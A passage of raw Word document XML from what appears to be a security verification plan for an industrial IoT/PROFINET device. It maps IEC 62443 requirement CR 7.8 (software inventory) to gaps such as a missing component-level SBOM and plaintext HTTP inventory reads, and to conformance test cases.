        <w:t>CR 7.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2ED42C" w14:textId="11CBF4DF" w:rsidR="0024048B" w:rsidRPr="0024048B" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Assets: </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="0024048B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>D (host FW, SCPU FW, bootloaders)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328E5B26" w14:textId="548B60E8" w:rsidR="0024048B" w:rsidRPr="0024048B" w:rsidRDefault="00196EB6">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00196EB6">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STRIDE: </w:t>
      </w:r>
      <w:r w:rsidR="007F5A7B" w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="0024048B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00710057">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tampering, </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="0024048B">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Information Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCE0C55" w14:textId="77777777" w:rsidR="00991FEB" w:rsidRPr="00DD2D6F" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Function (Mitigation): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511583E4" w14:textId="6F38CB16" w:rsidR="00DD2D6F" w:rsidRPr="00DD2D6F" w:rsidRDefault="00DD2D6F" w:rsidP="00DD2D6F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2D6F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Software inventory (IoT-Core)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2D6F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> /deviceinfo/swrevision, /swinfo/cpubootloaderversion, /swinfo/scpuversion, /swinfo/scpubootloaderversion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4171A795" w14:textId="203470D0" w:rsidR="00DD2D6F" w:rsidRPr="00DD2D6F" w:rsidRDefault="00DD2D6F" w:rsidP="00DD2D6F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2D6F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>I&amp;M0 SOFTWARE_REVISION / I&amp;M5 annotation</w:t>
      </w:r>
      <w:r w:rsidR="004C232E">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2D6F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PROFINET acyclic (SRIO-3002/3023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E86EE9D" w14:textId="308E06E0" w:rsidR="00991FEB" w:rsidRPr="00587B1C" w:rsidRDefault="00DD2D6F" w:rsidP="00587B1C">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2D6F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/firmware/version, /fieldbussetup/fieldbusfirmware</w:t>
      </w:r>
      <w:r w:rsidR="00587B1C">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2D6F">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PROFIsafe stack version (SRIO-2953, SRIO-2948).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193686C0" w14:textId="77777777" w:rsidR="00991FEB" w:rsidRPr="00991FEB" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F5A7B">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33526A41" w14:textId="3435DEB0" w:rsidR="00EB591A" w:rsidRPr="00EB591A" w:rsidRDefault="00EB591A" w:rsidP="00EB591A">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB591A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB591A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Identical root cause to RQ-004 G-2: no SBOM of µC/OS-II, PROFIsafe stack, STM32F7 STL, netX90 </w:t>
      </w:r>
      <w:r w:rsidR="00CF5E90" w:rsidRPr="00CF5E90">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00EB591A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> CR 7.8 met at product granularity, not component granularity. Reuse TC-RQ004-02; do not re-derive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2920674F" w14:textId="2BFC6FCB" w:rsidR="0024048B" w:rsidRPr="00C45114" w:rsidRDefault="00EB591A" w:rsidP="00C45114">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB591A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB591A">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Plaintext HTTP inventory read; defence-in-depth observation only (EN 50742 FR4 = none), not a conformance FAIL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005658E0" w14:textId="77777777" w:rsidR="00533DB1" w:rsidRPr="00DA402C" w:rsidRDefault="00533DB1" w:rsidP="00533DB1">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F9E30E8"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tbl>
      <w:tblPr>
        <w:tblStyle w:val="Gitternetztabelle5dunkelAkzent2"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="331"/>
        <w:gridCol w:w="3313"/>
        <w:gridCol w:w="2985"/>
        <w:gridCol w:w="1701"/>
        <w:gridCol w:w="958"/>
      </w:tblGrid>
      <w:tr w:rsidR="00900880" w14:paraId="45403595" w14:textId="77777777" w:rsidTr="00CC2D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C936188" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3313" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D118A01"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2985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34E81BE9"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1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4783816D"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1B090CE4"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7F5798" w14:paraId="4A55486E"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B547C28" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3313" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1CDD8D9A" w14:textId="77777777" w:rsidR="006438ED" w:rsidRPr="006438ED" w:rsidRDefault="002D285E" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="006438ED">
              <w:t xml:space="preserve">Enumerate the full installed-software surface (/deviceinfo/swinfo/*, I&amp;M0, I&amp;M5, /firmware/version, /fieldbussetup/fieldbusfirmware); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="032BDB02" w14:textId="0A55E923" w:rsidR="00900880" w:rsidRPr="006438ED" w:rsidRDefault="002D285E"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438ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>build the installed-software inventory</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="447D9259" w14:textId="06FA22D0" w:rsidR="00900880" w:rsidRPr="006438ED" w:rsidRDefault="007224D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224DF">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Functional CR 7.8; confirms host/SCPU/bootloader/stack identification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20644A23" w14:textId="710828B3" w:rsidR="00900880" w:rsidRPr="006438ED"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438ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Requirements-based verification; OWASP FSTM Stage 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="427CD71D" w14:textId="1D7A2B66" w:rsidR="00900880" w:rsidRPr="006438ED"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438ED">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00D258C9" w14:paraId="348C0C6D" w14:textId="77777777" w:rsidTr="00CC2DC3">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44C87615" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3313" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41D0255F" w14:textId="665D2D94" w:rsidR="00041E44" w:rsidRPr="00041E44" w:rsidRDefault="00041E4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41E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SBOM completeness / version</w:t>
            </w:r>
            <w:r w:rsidRPr="00041E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00041E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="00041E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00041E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5966E077" w14:textId="574D0BF2" w:rsidR="00900880" w:rsidRPr="00041E44" w:rsidRDefault="00041E44"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41E44">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>REUSE TC-RQ004-02 by reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ABE1117" w14:textId="38BE031C" w:rsidR="00900880" w:rsidRPr="006438ED" w:rsidRDefault="0008672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438ED">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Proves G-1 </w:t>
            </w:r>
            <w:r w:rsidR="00631E62">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="006438ED">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>requirement-specific)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="400B9B9D" w14:textId="77777777" w:rsidR="00817ED0"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817ED0">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP FSTM ‘SBOM Generation’; BSI TR-03183-2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48A293B8" w14:textId="3B5B7E5D" w:rsidR="00900880" w:rsidRPr="006438ED"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817ED0">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ifm CM-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2009D70F" w14:textId="562582AB" w:rsidR="00900880" w:rsidRPr="006438ED" w:rsidRDefault="00F23D36"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438ED">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00900880" w:rsidRPr="00D0764E" w14:paraId="169F4182"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7BC5915A" w14:textId="77777777" w:rsidR="00900880" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3313" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65662F24" w14:textId="6B8AB25F" w:rsidR="00900880" w:rsidRPr="006438ED" w:rsidRDefault="00FD721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D7211">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Passive plaintext capture of the inventory read (DiD observation)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C2B6540" w14:textId="3001892D" w:rsidR="00900880" w:rsidRPr="006438ED" w:rsidRDefault="003C03D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3C03DD">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Documents G-2 (DiD only)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47D814AD" w14:textId="495C2494" w:rsidR="00900880" w:rsidRPr="006438ED" w:rsidRDefault="00254A92"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6438ED">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:t>NIST SP 800-115 §3.5; OWASP ISTG-DES-INFO; ifm CM-005</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="479E152D" w14:textId="58942E19" w:rsidR="00900880" w:rsidRPr="006438ED" w:rsidRDefault="0066286F"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438ED">
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>SVV-3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="12C6E7AF" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73B2EF46" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="606CF687" w14:textId="77777777" w:rsidR="003C03DD" w:rsidRDefault="003C03DD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119DCB09" w14:textId="77777777" w:rsidR="003C03DD" w:rsidRDefault="003C03DD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3292544E" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="00DB074F" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:commentRangeStart w:id="7"/>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB074F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Two-Level Test Catalog</w:t>
      </w:r>
      <w:commentRangeEnd w:id="7"/>
      <w:r w:rsidR="006D7569" w:rsidRPr="00DB074F">
        <w:rPr>
          <w:rStyle w:val="Kommentarzeichen"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:commentReference w:id="7"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963E3A5" w14:textId="77777777" w:rsidR="008E13FA" w:rsidRDefault="008E13FA" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F4DD53" w14:textId="12938DE7" w:rsidR="008E13FA" w:rsidRDefault="00176591" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00176591">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ006-01 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00176591">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Installed-Software Inventory Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B1EA80A"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0C7BCEF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218B35" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BE64898"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3995A0E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4C02BE9" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B612A03" w14:textId="4E17CDAE" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="005561B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561B0">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>TC-RQ006-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="001604A0" w14:paraId="5B7826E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C4AF318"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225CC181" w14:textId="4E9DF8BE" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="00F5170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F5170B">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="pt-BR"/>
              </w:rPr>
              <w:t>RQ-006 → CR 7.8 → Asset D</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w:rsidRPr="00D67CA6" w14:paraId="1CA9828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B79A990" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="756AC8E2" w14:textId="242D287E" w:rsidR="00B73A1A" w:rsidRPr="00254A92" w:rsidRDefault="00F5170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Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B73A1A" w14:paraId="7A128AD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E02768D" w14:textId="77777777" w:rsidR="00B73A1A" w:rsidRDefault="00B73A1A" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
